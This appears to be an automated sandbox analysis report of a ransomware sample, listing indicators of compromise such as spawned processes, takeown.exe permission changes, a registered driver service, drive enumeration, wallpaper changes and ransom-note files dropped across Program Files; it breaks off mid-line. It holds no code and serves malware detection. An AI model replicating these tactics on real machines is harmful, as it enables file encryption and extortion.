pid Process 3860 NW2KZAaA.exe 4448 dgFQYQPu.exe 4480 dgFQYQPu64.exe 4840 dgFQYQPu.exe 4876 dgFQYQPu.exe 5040 dgFQYQPu.exe 5060 dgFQYQPu.exe 804 dgFQYQPu.exe 4176 dgFQYQPu.exe 504 dgFQYQPu.exe 4464 dgFQYQPu.exe 4632 dgFQYQPu.exe 4164 dgFQYQPu.exe 4644 dgFQYQPu.exe 4688 dgFQYQPu.exe 4980 dgFQYQPu.exe 5012 dgFQYQPu.exe 636 dgFQYQPu.exe 4168 dgFQYQPu.exe 4460 dgFQYQPu.exe 4492 dgFQYQPu.exe 4680 dgFQYQPu.exe 4476 dgFQYQPu.exe 4844 dgFQYQPu.exe 4148 dgFQYQPu.exe 4900 dgFQYQPu.exe 4952 dgFQYQPu.exe 4408 dgFQYQPu.exe 4204 dgFQYQPu.exe 4740 dgFQYQPu.exe 4652 dgFQYQPu.exe 4932 dgFQYQPu.exe 4116 dgFQYQPu.exe 4600 dgFQYQPu.exe 4660 dgFQYQPu.exe 5044 dgFQYQPu.exe 5092 dgFQYQPu.exe 4668 dgFQYQPu.exe 256 dgFQYQPu.exe 4416 dgFQYQPu.exe 4592 dgFQYQPu.exe 248 dgFQYQPu.exe 4292 dgFQYQPu.exe 4756 dgFQYQPu.exe 1648 dgFQYQPu.exe 1292 dgFQYQPu.exe 852 dgFQYQPu.exe 4624 dgFQYQPu.exe 4540 dgFQYQPu.exe 276 dgFQYQPu.exe 4752 dgFQYQPu.exe 5016 dgFQYQPu.exe 4608 dgFQYQPu.exe 3456 dgFQYQPu.exe 4948 dgFQYQPu.exe 4792 dgFQYQPu.exe 4704 dgFQYQPu.exe 4816 dgFQYQPu.exe 4424 dgFQYQPu.exe 5112 dgFQYQPu.exe 4384 dgFQYQPu.exe 5100 dgFQYQPu.exe 272 dgFQYQPu.exe 4136 dgFQYQPu.exe 5136 dgFQYQPu.exe 5264 dgFQYQPu.exe 5288 dgFQYQPu.exe 5416 dgFQYQPu.exe 5440 dgFQYQPu.exe 5568 dgFQYQPu.exe 5592 dgFQYQPu.exe 5720 dgFQYQPu.exe 5744 dgFQYQPu.exe 5872 dgFQYQPu.exe 5896 dgFQYQPu.exe 6024 dgFQYQPu.exe 6048 dgFQYQPu.exe 5148 dgFQYQPu.exe 4656 dgFQYQPu.exe 5192 dgFQYQPu.exe 5320 dgFQYQPu.exe 5472 dgFQYQPu.exe 5540 dgFQYQPu.exe 5692 dgFQYQPu.exe 5724 dgFQYQPu.exe 5884 dgFQYQPu.exe 5904 dgFQYQPu.exe 6056 dgFQYQPu.exe 5960 dgFQYQPu.exe 6116 dgFQYQPu.exe 6108 dgFQYQPu.exe 5240 dgFQYQPu.exe 5444 dgFQYQPu.exe 5500 dgFQYQPu.exe 5624 dgFQYQPu.exe 5820 dgFQYQPu.exe 5892 dgFQYQPu.exe 6052 dgFQYQPu.exe 5956 dgFQYQPu.exe 5284 dgFQYQPu.exe 6136 dgFQYQPu.exe 5184 dgFQYQPu.exe 5520 dgFQYQPu.exe 5680 dgFQYQPu.exe 5776 dgFQYQPu.exe 6044 dgFQYQPu.exe 5952 dgFQYQPu.exe 5132 dgFQYQPu.exe 6088 dgFQYQPu.exe 5480 dgFQYQPu.exe 5304 dgFQYQPu.exe 5632 dgFQYQPu.exe 5852 dgFQYQPu.exe 5760 dgFQYQPu.exe 6076 dgFQYQPu.exe 1544 dgFQYQPu.exe 5548 dgFQYQPu.exe 5604 dgFQYQPu.exe 5476 dgFQYQPu.exe 5944 dgFQYQPu.exe 6104 dgFQYQPu.exe 5224 dgFQYQPu.exe 4456 dgFQYQPu.exe 5460 dgFQYQPu.exe 5980 dgFQYQPu.exe 5316 dgFQYQPu.exe 3596 dgFQYQPu.exe 5736 dgFQYQPu.exe 5372 dgFQYQPu.exe 5912 dgFQYQPu.exe 5296 dgFQYQPu.exe 5408 dgFQYQPu.exe 5376 dgFQYQPu.exe 5740 dgFQYQPu.exe 5396 dgFQYQPu.exe 5516 NW2KZAaA.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\EditWait.tiff 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000100000001adb4-17.dat upx behavioral2/files/0x000100000001adb4-18.dat upx behavioral2/files/0x000100000001adb4-31.dat upx behavioral2/files/0x000100000001adb4-33.dat upx behavioral2/files/0x000100000001adb4-39.dat upx behavioral2/files/0x000100000001adb4-41.dat upx behavioral2/files/0x000100000001adb4-48.dat upx behavioral2/files/0x000100000001adb4-50.dat upx behavioral2/files/0x000100000001adb4-56.dat upx behavioral2/files/0x000100000001adb4-58.dat upx behavioral2/files/0x000100000001adb4-65.dat upx behavioral2/files/0x000100000001adb4-67.dat upx behavioral2/files/0x000100000001adb4-73.dat upx behavioral2/files/0x000100000001adb4-75.dat upx behavioral2/files/0x000100000001adb4-81.dat upx behavioral2/files/0x000100000001adb4-83.dat upx behavioral2/files/0x000100000001adb4-89.dat upx behavioral2/files/0x000100000001adb4-91.dat upx behavioral2/files/0x000100000001adb4-97.dat upx behavioral2/files/0x000100000001adb4-99.dat upx behavioral2/files/0x000100000001adb4-105.dat upx behavioral2/files/0x000100000001adb4-107.dat upx behavioral2/files/0x000100000001adb4-113.dat upx behavioral2/files/0x000100000001adb4-115.dat upx behavioral2/files/0x000100000001adb4-121.dat upx behavioral2/files/0x000100000001adb4-123.dat upx behavioral2/files/0x000100000001adb4-129.dat upx behavioral2/files/0x000100000001adb4-131.dat upx behavioral2/files/0x000100000001adb4-137.dat upx behavioral2/files/0x000100000001adb4-139.dat upx behavioral2/files/0x000100000001adb4-146.dat upx behavioral2/files/0x000100000001adb4-148.dat upx behavioral2/files/0x000100000001adb4-154.dat upx behavioral2/files/0x000100000001adb4-156.dat upx behavioral2/files/0x000100000001adb4-162.dat upx behavioral2/files/0x000100000001adb4-164.dat upx behavioral2/files/0x000100000001adb4-170.dat upx behavioral2/files/0x000100000001adb4-173.dat upx behavioral2/files/0x000100000001adb4-181.dat upx behavioral2/files/0x000100000001adb4-183.dat upx behavioral2/files/0x000100000001adb4-189.dat upx behavioral2/files/0x000100000001adb4-191.dat upx behavioral2/files/0x000100000001adb4-197.dat upx behavioral2/files/0x000100000001adb4-199.dat upx behavioral2/files/0x000100000001adb4-205.dat upx behavioral2/files/0x000100000001adb4-207.dat upx behavioral2/files/0x000100000001adb4-213.dat upx behavioral2/files/0x000100000001adb4-215.dat upx behavioral2/files/0x000100000001adb4-221.dat upx behavioral2/files/0x000100000001adb4-223.dat upx behavioral2/files/0x000100000001adb4-229.dat upx behavioral2/files/0x000100000001adb4-231.dat upx behavioral2/files/0x000100000001adb4-237.dat upx behavioral2/files/0x000100000001adb4-239.dat upx behavioral2/files/0x000100000001adb4-245.dat upx behavioral2/files/0x000100000001adb4-247.dat upx behavioral2/files/0x000100000001adb4-253.dat upx behavioral2/files/0x000100000001adb4-255.dat upx behavioral2/files/0x000100000001adb4-261.dat upx behavioral2/files/0x000100000001adb4-263.dat upx behavioral2/files/0x000100000001adb4-269.dat upx behavioral2/files/0x000100000001adb4-271.dat upx behavioral2/files/0x000100000001adb4-277.dat upx behavioral2/files/0x000100000001adb4-279.dat upx behavioral2/files/0x000100000001adb4-285.dat upx behavioral2/files/0x000100000001adb4-287.dat upx behavioral2/files/0x000100000001adb4-293.dat upx behavioral2/files/0x000100000001adb4-295.dat upx behavioral2/files/0x000100000001adb4-301.dat upx behavioral2/files/0x000100000001adb4-303.dat upx behavioral2/files/0x000100000001adb4-309.dat upx behavioral2/files/0x000100000001adb4-311.dat upx behavioral2/files/0x000100000001adb4-317.dat upx behavioral2/files/0x000100000001adb4-319.dat upx behavioral2/files/0x000100000001adb4-325.dat upx behavioral2/files/0x000100000001adb4-327.dat upx behavioral2/files/0x000100000001adb4-333.dat upx behavioral2/files/0x000100000001adb4-335.dat upx behavioral2/files/0x000100000001adb4-341.dat upx behavioral2/files/0x000100000001adb4-343.dat upx behavioral2/files/0x000100000001adb4-349.dat upx behavioral2/files/0x000100000001adb4-351.dat upx behavioral2/files/0x000100000001adb4-357.dat upx behavioral2/files/0x000100000001adb4-359.dat upx behavioral2/files/0x000100000001adb4-365.dat upx behavioral2/files/0x000100000001adb4-367.dat upx behavioral2/files/0x000100000001adb4-373.dat upx behavioral2/files/0x000100000001adb4-375.dat upx behavioral2/files/0x000100000001adb4-381.dat upx behavioral2/files/0x000100000001adb4-383.dat upx behavioral2/files/0x000100000001adb4-389.dat upx behavioral2/files/0x000100000001adb4-391.dat upx behavioral2/files/0x000100000001adb4-397.dat upx behavioral2/files/0x000100000001adb4-399.dat upx behavioral2/files/0x000100000001adb4-405.dat upx behavioral2/files/0x000100000001adb4-407.dat upx behavioral2/files/0x000100000001adb4-413.dat upx behavioral2/files/0x000100000001adb4-415.dat upx behavioral2/files/0x000100000001adb4-421.dat upx behavioral2/files/0x000100000001adb4-423.dat upx behavioral2/files/0x000100000001adb4-429.dat upx behavioral2/files/0x000100000001adb4-431.dat upx behavioral2/files/0x000100000001adb4-437.dat upx behavioral2/files/0x000100000001adb4-439.dat upx behavioral2/files/0x000100000001adb4-445.dat upx behavioral2/files/0x000100000001adb4-447.dat upx behavioral2/files/0x000100000001adb4-453.dat upx behavioral2/files/0x000100000001adb4-455.dat upx behavioral2/files/0x000100000001adb4-461.dat upx behavioral2/files/0x000100000001adb4-463.dat upx behavioral2/files/0x000100000001adb4-469.dat upx behavioral2/files/0x000100000001adb4-471.dat upx behavioral2/files/0x000100000001adb4-477.dat upx behavioral2/files/0x000100000001adb4-479.dat upx behavioral2/files/0x000100000001adb4-485.dat upx behavioral2/files/0x000100000001adb4-487.dat upx behavioral2/files/0x000100000001adb4-493.dat upx behavioral2/files/0x000100000001adb4-495.dat upx behavioral2/files/0x000100000001adb4-501.dat upx behavioral2/files/0x000100000001adb4-503.dat upx behavioral2/files/0x000100000001adb4-509.dat upx behavioral2/files/0x000100000001adb4-511.dat upx behavioral2/files/0x000100000001adb4-517.dat upx behavioral2/files/0x000100000001adb4-519.dat upx behavioral2/files/0x000100000001adb4-525.dat upx behavioral2/files/0x000100000001adb4-527.dat upx behavioral2/files/0x000100000001adb4-533.dat upx behavioral2/files/0x000100000001adb4-535.dat upx behavioral2/files/0x000100000001adb4-541.dat upx behavioral2/files/0x000100000001adb4-543.dat upx behavioral2/files/0x000100000001adb4-549.dat upx behavioral2/files/0x000100000001adb4-551.dat upx behavioral2/files/0x000100000001adb4-557.dat upx behavioral2/files/0x000100000001adb4-559.dat upx -
Modifies file permissions 1 TTPs 67 IoCs
pid Process 5004 takeown.exe 4628 takeown.exe 6100 takeown.exe 5572 takeown.exe 6140 takeown.exe 5364 takeown.exe 4732 takeown.exe 4516 takeown.exe 4936 takeown.exe 4884 takeown.exe 4300 takeown.exe 2732 takeown.exe 5992 takeown.exe 5492 takeown.exe 3840 takeown.exe 1488 takeown.exe 4488 takeown.exe 4784 takeown.exe 4968 takeown.exe 5380 takeown.exe 5252 takeown.exe 6000 takeown.exe 5244 takeown.exe 4828 takeown.exe 4860 takeown.exe 5432 takeown.exe 5652 takeown.exe 4664 takeown.exe 5428 takeown.exe 2080 takeown.exe 4240 takeown.exe 268 takeown.exe 5988 takeown.exe 5876 takeown.exe 5656 takeown.exe 5484 takeown.exe 5828 takeown.exe 5748 takeown.exe 4180 takeown.exe 5048 takeown.exe 5836 takeown.exe 5280 takeown.exe 4536 takeown.exe 1888 takeown.exe 5036 takeown.exe 4400 takeown.exe 1660 takeown.exe 5684 takeown.exe 5156 takeown.exe 5716 takeown.exe 4788 takeown.exe 5228 takeown.exe 5532 takeown.exe 5356 takeown.exe 4852 takeown.exe 5308 takeown.exe 4372 takeown.exe 4568 takeown.exe 5764 takeown.exe 5008 takeown.exe 5544 takeown.exe 5848 takeown.exe 5536 takeown.exe 580 takeown.exe 2084 takeown.exe 5324 takeown.exe 5756 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Admin\Searches\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Music\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Documents\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Music\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\Videos\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Users\Admin\Links\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\I: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\F: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\B: dgFQYQPu64.exe File opened (read-only) \??\X: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\T: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\R: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\P: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\E: dgFQYQPu64.exe File opened (read-only) \??\V: dgFQYQPu64.exe File opened (read-only) \??\N: dgFQYQPu64.exe File opened (read-only) \??\U: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\O: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\L: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\G: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\X: dgFQYQPu64.exe File opened (read-only) \??\Y: dgFQYQPu64.exe File opened (read-only) \??\Z: dgFQYQPu64.exe File opened (read-only) \??\Q: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\M: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\Q: dgFQYQPu64.exe File opened (read-only) \??\R: dgFQYQPu64.exe File opened (read-only) \??\I: dgFQYQPu64.exe File opened (read-only) \??\K: dgFQYQPu64.exe File opened (read-only) \??\M: dgFQYQPu64.exe File opened (read-only) \??\J: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\A: dgFQYQPu64.exe File opened (read-only) \??\G: dgFQYQPu64.exe File opened (read-only) \??\H: dgFQYQPu64.exe File opened (read-only) \??\L: dgFQYQPu64.exe File opened (read-only) \??\P: dgFQYQPu64.exe File opened (read-only) \??\S: dgFQYQPu64.exe File opened (read-only) \??\U: dgFQYQPu64.exe File opened (read-only) \??\Z: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\V: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\H: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\F: dgFQYQPu64.exe File opened (read-only) \??\W: dgFQYQPu64.exe File opened (read-only) \??\S: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\O: dgFQYQPu64.exe File opened (read-only) \??\T: dgFQYQPu64.exe File opened (read-only) \??\J: dgFQYQPu64.exe File opened (read-only) \??\Y: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\W: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\N: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened (read-only) \??\E: 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 dgFQYQPu64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ErrorControl = "1" dgFQYQPu64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 dgFQYQPu64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Type = "1" dgFQYQPu64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\Start = "3" dgFQYQPu64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" dgFQYQPu64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7f00h8kS.bmp" reg.exe -
Drops file in Program Files directory 5650 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzmappings 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\Welcome.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmiregistry.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\sound.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main-selector.css 